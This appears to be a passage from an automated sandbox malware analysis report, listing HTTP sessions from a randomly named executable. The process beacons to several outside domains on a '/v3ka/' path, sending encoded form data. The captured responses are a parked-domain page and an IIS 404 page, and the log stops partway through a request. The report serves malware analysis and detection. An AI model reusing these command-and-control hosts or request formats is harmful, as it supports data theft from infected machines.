45 5a 54 68 59 4f 77 4a 71 2f 79 73 58 54 4b 4f 55 47 4f 74 62 4a 63 6a 76 70 4f 76 31 70 74 6b 6c 46 51 57 70 64 43 69 78 4e 79 36 71 70 65 65 6d 34 7a 30 49 50 42 52 30 6d 53 6a 33 7a 46 76 4d 69 55 5a 68 55 68 42 47 41 44 54 62 7a 74 51 36 74 41 71 57 69 61 35 74 77 51 55 39 59 61 64 52 6f 35 2f 6c 58 6a 45 64 70 39 4c 4d 32 65 50 4b 64 34 71 79 48 56 7a 5a 2b 38 7a 50 4b 58 33 79 6f 6e 51 43 46 62 34 79 4b 44 74 75 5a 37 34 31 78 44 41 66 45 4a 72 63 4d 48 2b 57 51 73 66 44 53 4c 5a 56 41 65 63 41 58 6a 55 45 45 71 68 49 47 6f 75 5a 33 48 6f 39 66 2b 4f 6e 33 71 30 50 59 7a 52 33 4a 6d 76 33 36 39 6c 61 52 42 38 76 55 78 6c 4b 35 67 30 69 44 32 47 65 64 54 46 32 50 6b 4e 53 38 6f 57 79 39 73 38 68 41 39 61 56 74 2f 51 55 36 6c 69 4d 77 66 69 70 67 48 58 7a 53 51 72 39 4a 47 43 4a 67 6f 67 45 55 37 38 68 44 4e 70 64 70 74 59 4a 54 68 4c 43 41 6b 2b 59 53 39 6d 4d 34 30 33 4e 31 41 64 4a 47 63 4d 48 44 34 33 57 67 59 59 6c 7a 70 62 42 69 33 68 77 35 30 6d 37 6c 6f 55 57 41 32 4f 5a 36 77 63 54 45 4d 48 51 68 4f 4a 4a 31 38 78 52 5a 35 48 6f 66 59 35 49 50 6c 70 30 34 44 79 43 2b 54 33 35 76 6b 39 41 77 41 38 44 64 35 66 2b 62 2b 5a 68 75 66 49 35 44 50 50 51 68 49 76 6c 69 4b 72 7a 59 75 6f 35 6d 30 49 63 49 67 7a 51 6d 55 52 5a 55 70 6d 34 64 52 61 74 4c 43 74 4c 6c 36 4d 77 4e 6c 75 64 4f 53 58 54 6c 4a 78 4b 35 58 79 47 54 45 77 64 57 30 50 45 50 53 38 66 62 4f 43 57 45 79 53 4f 57 51 37 61 68 36 73 6b 53 45 79 4d 35 34 7a 59 4b 70 50 77 2b 6b 47 52 4c
                                                                                    Data Ascii: c4qx7JIP=hgTlIlyCji2xH0amRFLQI/ZyzqCi6fkYPoHe1xCPFl4PMM9DQc4ESpHIFYNPRGa5xaSNeJYncxgkauW5zIYFo0TeRKbvwfy+RHfVGqVe8wUjaDaXK08K4LnhHNemcZYoS5pchRfOwxqLJP/kkwzZj4C2M0GfIbghgQfQPkaF+ED0xTbA1vKBecmOBrJY+ngH7eq1zt5fozjpAJRC5eIj+HIababuLusXjUKCuPSa30LNSK1lDF3VupfiOIrErlJtDN2M6QlLc/D1D1nhPcn62em/ftLkIQwuhHVgCfx7el1tRFtAi1WMYVqZBF2cP2OgGr8wb+kFnsAhV4xAChEmnSXLrXMIcrQx/mud/a1UvZcSHjJsKIApzIiCfiPOe/Kczd3StjVicb7oKl3N5Wao+y0RYcc4EgjVEJsAHm8OBQyHT2xkpJN2kfnGDWO9dzyAiLcNYE+cbxxRKuoYU+1zQ8eCIvK/z6b8F1eDZ2v7+U36OFXlj2vU4ciDfiiaEqscfjDqK4nqcYU2yy1DgDAl1wL5IIvnnUFtJvq2H92eHrECq6M9CptgKEUjl4iXdHgc1p+IgjG0+rHEVZsGmH7tf03Ar2xeBjq0PQmCayMV3oVcvO7dX2ZHSQIjIPYsYoEZThYOwJq/ysXTKOUGOtbJcjvpOv1ptklFQWpdCixNy6qpeem4z0IPBR0mSj3zFvMiUZhUhBGADTbztQ6tAqWia5twQU9YadRo5/lXjEdp9LM2ePKd4qyHVzZ+8zPKX3yonQCFb4yKDtuZ741xDAfEJrcMH+WQsfDSLZVAecAXjUEEqhIGouZ3Ho9f+On3q0PYzR3Jmv369laRB8vUxlK5g0iD2GedTF2PkNS8oWy9s8hA9aVt/QU6liMwfipgHXzSQr9JGCJgogEU78hDNpdptYJThLCAk+YS9mM403N1AdJGcMHD43WgYYlzpbBi3hw50m7loUWA2OZ6wcTEMHQhOJJ18xRZ5HofY5IPlp04DyC+T35vk9AwA8Dd5f+b+ZhufI5DPPQhIvliKrzYuo5m0IcIgzQmURZUpm4dRatLCtLl6MwNludOSXTlJxK5XyGTEwdW0PEPS8fbOCWEySOWQ7ah6skSEyM54zYKpPw+kGRL


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.11.304983184.32.84.32806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:57.009166956 CET468OUTGET /v3ka/?c4qx7JIP=si7FLVHJ8iWuYVaGSkvjNM53tbCy++USJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfNROmTcvWRWJJAUk/s4=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:57.164010048 CET1286INHTTP/1.1 200 OK
                                                                                    Server: hcdn
                                                                                    Date: Mon, 18 Mar 2024 14:09:57 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 10066
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    x-hcdn-request-id: 8af7f363c2afd123a3f4a4c3defa5c90-phx-edge2
                                                                                    Expires: Mon, 18 Mar 2024 14:09:56 GMT
                                                                                    Cache-Control: no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67
                                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding
                                                                                    Mar 18, 2024 15:09:57.164093971 CET1286INData Raw: 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23
                                                                                    Data Ascii: :0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weigh
                                                                                    Mar 18, 2024 15:09:57.164180994 CET1286INData Raw: 72 3a 23 63 64 63 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61
                                                                                    Data Ascii: r:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:2
                                                                                    Mar 18, 2024 15:09:57.164268970 CET1286INData Raw: 67 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d
                                                                                    Data Ascii: ge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.mess
                                                                                    Mar 18, 2024 15:09:57.164375067 CET1286INData Raw: 67 65 72 2e 63 6f 6d 2f 74 75 74 6f 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c
                                                                                    Data Ascii: ger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href
                                                                                    Mar 18, 2024 15:09:57.164390087 CET1286INData Raw: 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                                                    Data Ascii: y website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-ti
                                                                                    Mar 18, 2024 15:09:57.164464951 CET1286INData Raw: 66 6f 72 28 76 61 72 20 72 2c 65 3d 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72
                                                                                    Data Ascii: for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}retu
                                                                                    Mar 18, 2024 15:09:57.164586067 CET1286INData Raw: 31 29 2d 36 35 3c 32 36 29 2c 6d 2e 73 70 6c 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66
                                                                                    Data Ascii: 1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var
                                                                                    Mar 18, 2024 15:09:57.164623022 CET118INData Raw: 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70
                                                                                    Data Ascii: .location.hostname,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.11.304983262.149.128.45806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:02.687062025 CET730OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Origin: http://www.clarycyber.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.clarycyber.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 45 36 6f 54 67 70 65 6f 65 6b 51 43 4b 55 78 62 39 36 34 58 58 6f 58 4c 51 6d 61 35 46 72 61 75 38 74 5a 47 36 57 2f 55 72 63 63 6b 74 6b 76 6a 6e 6a 61 54 61 6e 31 58 77 61 4b 6b 78 31 4a 54 36 74 53 35 36 47 31 56 78 58 54 31 34 30 57 48 71 4d 57 66 44 48 51 54 46 44 56 66 39 68 78 30 6e 47 71 54 34 30 32 53 36 74 35 4a 6e 2b 62 6a 71 78 32 70 6e 4a 51 72 57 76 6e 72 4b 71 50 69 4c 58 76 79 4d 42 69 32 49 72 69 67 49 63 36 73 41 62 30 33 2f 35 74 4a 36 4b 2b 57 51 69 38 55 4d 49 33 57 58 4d 66 43 6f 6a 4d 53 78 57 71 50 35 2f 35 49 6b 49 50 45 62 30 52 70 51 42 67 42 43 67 3d 3d
                                                                                    Data Ascii: c4qx7JIP=E6oTgpeoekQCKUxb964XXoXLQma5Frau8tZG6W/UrccktkvjnjaTan1XwaKkx1JT6tS56G1VxXT140WHqMWfDHQTFDVf9hx0nGqT402S6t5Jn+bjqx2pnJQrWvnrKqPiLXvyMBi2IrigIc6sAb03/5tJ6K+WQi8UMI3WXMfCojMSxWqP5/5IkIPEb0RpQBgBCg==
                                                                                    Mar 18, 2024 15:10:02.880801916 CET1286INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    X-Powered-By: ASP.NET
                                                                                    Date: Mon, 18 Mar 2024 14:10:01 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 4956
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;
                                                                                    Mar 18, 2024 15:10:02.880886078 CET1286INData Raw: 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69
                                                                                    Data Ascii: color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relativ
                                                                                    Mar 18, 2024 15:10:02.881038904 CET1286INData Raw: 33 33 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74
                                                                                    Data Ascii: 33;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or i
                                                                                    Mar 18, 2024 15:10:02.881053925 CET1286INData Raw: 73 70 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52
                                                                                    Data Ascii: sp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070
                                                                                    Mar 18, 2024 15:10:02.881067038 CET31INData Raw: 69 76 3e 20 0a 3c 2f 64 69 76 3e 20 0a 3c 2f 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                    Data Ascii: iv> </div> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.11.304983362.149.128.45806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:05.405242920 CET750OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.clarycyber.com
                                                                                    Origin: http://www.clarycyber.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.clarycyber.com/v3ka/
